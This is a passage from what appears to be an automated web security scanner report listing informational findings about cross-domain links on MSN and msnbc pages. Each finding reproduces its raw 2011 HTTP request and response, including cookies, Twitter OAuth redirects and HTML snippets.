Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:53:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA19
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: facebook_userid=; expires=Fri, 28-Jan-2011 23:53:36 GMT; path=/; HttpOnly
Set-Cookie: facebook_session_key=; domain=www.redacted; expires=Fri, 28-Jan-2011 23:53:36 GMT; HttpOnly
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 1234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<met
...[SNIP]...
</title>
<link rel="SHORTCUT ICON" href="http://col.stc.s-redacted/br/sc/i/DF/854F4951FCBF6C450892031DA153B1.ico" type="image/x-icon" />
</head>
...[SNIP]...
<h1><img src="http&#58;&#47;&#47;col.stc.s-redacted&#47;br&#47;sc&#47;i&#47;A5&#47;13721023C2BA909660AFAA5030D10F.png" alt="MSN" /></h1>
...[SNIP]...

22.436. http://www.redacted/scp/AuthServiceTwitter.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /scp/AuthServiceTwitter.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:53:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&lang=en
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 220

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://twitter.com/oauth/authorize?oauth_token=9T0KnvKj2f5TMU7GEkBamV6wKekTBMsAa6sruPRY0zM&amp;lang=en">here</a>.</h
...[SNIP]...

22.437. http://www.redacted/scp/AuthServiceTwitter.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /scp/AuthServiceTwitter.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 17:10:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://twitter.com/oauth/authorize?oauth_token=GyGZcgtBmTImMxbbFIU7wxGUd01aaZThGreMIOYHjRQ&lang=en
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 220

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://twitter.com/oauth/authorize?oauth_token=GyGZcgtBmTImMxbbFIU7wxGUd01aaZThGreMIOYHjRQ&amp;lang=en">here</a>.</h
...[SNIP]...

22.438. http://www.msnbc.redacted/id/21134540/vp/41314849

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/21134540/vp/41314849

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/21134540/vp/41314849?from=en-us_msnhp&GT1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:20 GMT
Date: Sat, 29 Jan 2011 23:54:20 GMT
Content-Length: 3959
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html><head><title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;

...[SNIP]...
</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=lucida+grande&amp;colorscheme=light&amp;height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&amp;layout=button_count&amp;show_faces=false&amp;width=135&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...

22.439. http://www.msnbc.redacted/id/21134540/vp/41317511

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/21134540/vp/41317511

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/21134540/vp/41317511?from=en-us_msnhp&gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:27 GMT
Date: Sat, 29 Jan 2011 23:54:27 GMT
Content-Length: 3959
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html><head><title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;

...[SNIP]...
</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=lucida+grande&amp;colorscheme=light&amp;height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&amp;layout=button_count&amp;show_faces=false&amp;width=135&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...

22.440. http://www.msnbc.redacted/id/21134540/vp/41326711

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/21134540/vp/41326711

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/21134540/vp/41326711?from=en-us_msnhp&gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:22 GMT
Date: Sat, 29 Jan 2011 23:54:22 GMT
Content-Length: 3959
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html><head><title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;

...[SNIP]...
</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=lucida+grande&amp;colorscheme=light&amp;height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&amp;layout=button_count&amp;show_faces=false&amp;width=135&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...

22.441. http://www.msnbc.redacted/id/21134540/vp=41325705&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/21134540/vp=41325705&

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/21134540/vp=41325705&?from=en-us_msnhp&gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:14 GMT
Date: Sat, 29 Jan 2011 23:54:14 GMT
Content-Length: 3959
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html><head><title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;

...[SNIP]...
</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;font=lucida+grande&amp;colorscheme=light&amp;height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.redacted%2F21134540&amp;layout=button_count&amp;show_faces=false&amp;width=135&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...

22.442. http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41253088/ns/technology_and_science-science

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/41253088/ns/technology_and_science-science?GT1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 63050


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">
   
    <a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41253088/ns/health-kids_and_parenting/"></a>
...[SNIP]...
<p>Indeed, the findings call to mind the recent media buzz over the "<a href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html"> Tiger Mom</a>
...[SNIP]...
<p>"That's one way to teach self-control, with extreme discipline," said Ernst Fehr at the University of Zurich. "There may be other ways. There was also a '<a href="http://edition.cnn.com/2011/OPINION/01/15/christakis.dolphin.mom/index.html?hpt=C2"> Dolphin Mom </a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41253088/ns/health-kids_and_parenting/"></a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7542"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

22.443. http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41311073/ns/business-consumer_news/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/41311073/ns/business-consumer_news/?gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 64415


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.redacted/j/MSNBC/Components/Photo/_new/tz-biz-110125-tacobell-134p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">
   
    <a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41311073/ns/business-retail/"></a>
...[SNIP]...
<li class="i4 " about="http://lifeinc.todayshow.com/_news/2011/01/21/5894196-survey-most-people-go-to-work-when-sick">

<a class="h6" href="http://lifeinc.todayshow.com/_news/2011/01/21/5894196-survey-most-people-go-to-work-when-sick">

<span property="dc:title">
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41311073/ns/business-retail/"></a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

22.444. http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41320309/ns/technology_and_science-tech_and_gadgets

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /id/41320309/ns/technology_and_science-tech_and_gadgets?gt1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 75327


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110128/nn_05bwi_tweets_110128.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">
   
    <a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets/"></a>
...[SNIP]...
<li><a href="http://www.lifeslittlemysteries.com/how-does-a-virus-infect-your-computer-0826/'">How Does a Virus Infect Your Computer? </a>
...[SNIP]...
<li><a href="http://www.lifeslittlemysteries.com/protect-internet-passwords-cyber-security-hackers-1049/">How to Writer Strong Computer Passwords </a>
...[SNIP]...
